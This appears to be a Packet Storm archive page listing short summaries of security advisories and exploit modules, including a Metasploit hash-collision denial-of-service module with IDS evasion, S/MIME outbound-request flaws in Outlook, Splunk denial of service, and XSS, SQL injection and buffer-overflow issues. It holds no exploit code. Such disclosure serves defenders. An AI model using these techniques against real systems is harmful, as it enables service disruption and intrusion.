This Metasploit module uses a denial-of-service (DoS) condition appearing in a variety of programming languages. This vulnerability occurs when storing multiple values in a hash table and all values have the same hash value. This can cause a web server parsing the POST parameters issued with a request into a hash table to consume hours of CPU with a single HTTP request. Currently, only the hash functions for PHP and Java are implemented. This Metasploit module was tested with PHP + httpd, Tomcat, Glassfish and Geronimo. It also generates a random payload to bypass some IDS signatures.
b029e67e4fc45769ef0806adf780beee36692122a886f5bb14135c025f43efbcA design bug in X.509 certificate chain validation (RFC 3280) allows attackers to trigger (blind) HTTP requests for both external as well as internal IPs if a specially-crafted, S/MIME-signed email is opened in Microsoft Outlook. This issue, which has been originally reported in 2008, has been revisited and timing differences make it possible to identify open and closed ports on internal networks.
9365e6ebb217675995930a39307adaa0068c69e67328ec203f67fb4ba9ac8f00IBM Lotus iNotes suffered from four cross site scripting vulnerabilities.
618ce3eda1131f575c8580bda8bf0d3b521173ae62782e832850453ccb773385The Lotus Notes mail client accepts applet tags inside HTML emails, making it possible to load Java applets from a remote location. Combined with known Java sandbox escape vulnerabilities, it can be used to fully compromise the user reading the email.
72507df8ce813a6baed8ae1404ff3467f4a3d09f17024073ea1c0b531c0f08c6Splunk versions 4.0 through 4.3.4 suffer from an unauthenticated remote denial of service vulnerability against splunkd.
712c0f2ebc8a92c6651117dcb6b048dd30c332c12100a46fccd41ffa48f1183dSplunk version 4.3.x suffers from a denial of service hash table vulnerability.
d5cbcf654bede60e73b046c746c6d6c0a805b9e9a6f72f4af8548cd3f36fa296Most hash functions used in hash table implementations can be broken faster than by using brute-force techniques (which is feasible for hash functions with 32 bit output, but very expensive for 64 bit functions) by using one of two "tricks": equivalent substrings or a meet-in-the-middle attack.
5ba7d905a60a09b9e51b4bfc83a4c27718fe15666e0535630b7937cc69f6152fSQL-Ledger suffers from cross site scripting, cross site request forgery, local file inclusion, SQL injection, and various other security vulnerabilities.
3829bdb05149d1bc7598b7a78e6ebb24bc4dda65fe6aa1226850034c3332a707CAcert suffered from a cross site scripting vulnerability when parsing a given X.509 certificate.
010dc8224e527b25fcbaf1dd8c4db3d011ad35ad977a4c283f92787b8471e40cOpera versions below 9.25 are susceptible to a heap-based buffer overflow that allows for a denial of service and possibly code execution.
f6dc341cce8dd3f5bc84c05a0c44cde29463acefebfde3867a34bf222e7aabf7Debian OpenSSL weak client Diffie-Hellman Exchange checker version 0.1.
f751596b32f587e79025ba709c16d9fdad9f31526709e13da3da0d3110928de6Apache-SSL versions prior to apache_1.3.41+ssl_1.59 suffer from a memory disclosure vulnerability that may allow for privilege escalation.
39036c5cb769695609adfa378084ea68badbe067b04e9ae812fda9a39d1ed918Microsoft Office 2007 has a design flaw that allows outbound HTTP requests to be made when a document is opened that has a digital signature.
b4cb7f3e817924351a210a026c7bec9e430863cef89fb05b4f7fa6540b4f7384Windows Live Mail has a design flaw that allows outbound HTTP requests to be made via a simple preview of a mail that is S/MIME-signed.
4d5511e520d30bf9ecbbdb40513e02a8b285c8a0a0062c017da8916a99f7afc5Microsoft Outlook has a design flaw that allows outbound HTTP requests to be made via a simple preview of a mail that is S/MIME-signed.
1ff267973798cd8447b986b796dd166b737f9cbfe9fb69d0bef95485ff36340aOpenCA version 0.9.2.5 suffers from a cross site request forgery vulnerability.
c8cc08a802f0472bdd435e3b3e2dacbf30c477ffb9c1ff098f2c5e82d42a1001Stampit Web suffers from a denial of service vulnerability.
e61e043ac6440a474444d36cbba6289065dc1f9dafa15661b38403cd78790bb9DropAFew versions 0.2 and below suffer from SQL injection vulnerabilities.
d70a0ebccd74c188c38dd1d78303d396a7e2aa349786b47a134cca14004840c7MetaSploit exploit for the remote buffer overflow issue in dproxy versions 0.5 and below.
93a48384d4123533a4cf4d4b95a8e2faf0006039c1860712e18e3f39485121bcdproxy suffers from a typical buffer overflow condition, which allows an attacker to overwrite the stack. Version 0.5 and below are affected.
105b19b9f636ba774d84d4ddd91b39ff45110d8e236554da8ee19b7dd5e116e5JSBoard releases 2.0.10 and 2.0.11 suffer from a cross site scripting vulnerability.
ef4921c4eaae2c60489129528cea8016ef9baaaed728b17d6583b53923c60897
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed